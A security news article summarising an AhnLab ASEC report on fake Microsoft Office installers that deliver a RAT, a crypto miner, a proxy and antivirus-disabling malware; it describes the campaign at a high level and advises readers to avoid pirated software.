Distribution of malware via counterfeit copies of Microsoft Office

The AhnLab Security Intelligence Center (ASEC) has revealed a new malicious campaign targeting users looking for pirated versions of popular software such as Microsoft Office, Windows, and Hangul Word Processor. Hackers exploit fake Microsoft Office installers, tricking victims with a well-designed interface that allows them to choose between different versions, languages, and 32-bit or 64-bit architectures. Behind this facade, various types of malware are hidden, including RATs, cryptocurrency miners, droppers, proxies and antivirus evasion systems. The fake installer launches obfuscated .NET malware, which connects to messaging channels such as Telegram or Mastodon to obtain a genuine download URL.

Malware distribution methodology

The distributed URLs point to legitimate services such as Google Drive or GitHub, making it more difficult for antiviruses to identify them. The payloads are base64 encoded and contain PowerShell commands that unpack different malware strains using 7Zip. Among the components identified, there is a malware called "Updater", which exploits the Windows Task Scheduler to ensure the persistence of threats even after a system restart. This sophisticated technique allows attackers to maintain continuous access to the compromised system, making it difficult for victims to completely wipe their devices once infected.

Types of malware involved

ASEC research identified various types of malware installed via this campaign. Among these, Orcus RAT is a remote access Trojan that allows total control of the system, with keylogging functions, webcam access and other exfiltration capabilities. XMRig is a cryptocurrency miner that leverages system resources to mine Monero, suspending mining during heavy resource use to avoid suspicion. 3Proxy turns infected systems into proxy servers, allowing attackers to route malicious traffic. PureCrypter downloads and executes additional malicious payloads, ensuring continued infection. Finally, AntiAV disables security software, manipulating its configuration files to prevent it from working properly and leaving the system vulnerable.

Implications and advice for users

This strategy of infection through pirated software is not new but continues to be effective, as demonstrated by the spread of the STOP ransomware, currently one of the most active ransomware operations targeting consumer users. Pirated programs lack digital signatures and users tend to ignore security warnings since they know they are using unofficial material. This behavior, combined with any easily overlooked graphic discrepancies, makes pirated files an ideal vector for malware infections. You are strongly advised to avoid downloading and installing pirated software and always use authentic and updated versions of programs to avoid security compromises.